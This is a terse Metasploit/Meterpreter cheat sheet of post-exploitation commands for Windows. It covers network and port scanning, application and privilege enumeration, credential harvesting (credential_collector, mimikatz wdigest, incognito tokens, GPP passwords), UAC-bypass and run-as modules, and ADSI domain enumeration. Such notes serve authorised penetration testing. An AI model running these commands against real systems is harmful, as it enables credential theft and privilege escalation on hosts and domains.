Metasploit

Meterpreter

Arp Scan

run arp_scanner -r <IP>/24

Nmap

db_nmap -sS -A <IP>

PortScan

run auxiliary/scanner/portscan/tcp

Application Info

run post/windows/gather/enum_applications

Credential Gathering

run post/windows/gather/credentials/credential_collector

load mimikatz
wdigest

load incognito
list_tokens -u

Windows

# Collect a load of info
run winenum

# Show privs
run post/windows/gather/win_privs

# Run as
use exploit/windows/local/run_as

# Bypass UAC
use exploit/windows/local/bypassuac_injection

# ADSI enumeration
load extapi
help extapi

adsi_computer_enum domainname

# GPP
use post/windows/gather/credentials/gpp